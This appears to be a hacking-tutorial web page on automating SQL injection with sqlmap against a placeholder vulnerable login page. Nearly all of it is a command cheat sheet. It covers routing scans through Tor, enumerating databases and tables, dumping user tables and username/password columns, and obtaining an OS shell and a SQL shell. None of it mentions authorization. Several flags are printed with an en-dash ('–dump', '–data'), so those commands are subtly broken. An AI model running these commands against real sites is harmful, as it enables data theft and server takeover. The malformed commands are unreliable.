Josh_Hacking

Lesson
Detailed Info

SQL Injection Automated

We have already seen sql injection attacks done manually in the browser side. There we may have very limited data to be exposed. But if we use a automated tool like SQLMap or Havij we can find more data or more databases based on the security provided by the developer.

In this session we are using SqlMap a tool for sql injection from Kali linux. Once we find the vulnerable link, we need to paste the link in the tool and it will do the rest.

Scanning option

sqlmap -u "http://sqlvulnerablesite.com/login.php"

Scanning by using tor

sqlmap -u "http://sqlvulnerablesite.com/login.php" --tor --tor-type=SOCKS5

Scanning by manually setting the return time

sqlmap -u "http://sqlvulnerablesite.com/login.php" --time-sec 15

Once you find the link is vulnerable to sql injection.

List all databases at the site

sqlmap -u "http://sqlvulnerablesite.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://sqlvulnerablesite.com/login.php" -D site_db --tables

Dump the contents of a DB table

sqlmap -u "http://sqlvulnerablesite.com/login.php" -D site_db -T users –dump

List all columns in a table

sqlmap -u "http://sqlvulnerablesite.com/login.php" -D site_db -T users --columns

Dump only selected columns

sqlmap -u "http://sqlvulnerablesite.com/login.php" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "http://sqlvulnerablesite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump

Get OS Shell

sqlmap --dbms=mysql -u "http://sqlvulnerablesite.com/login.php" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "http://sqlvulnerablesite.com/login.php" --sql-shell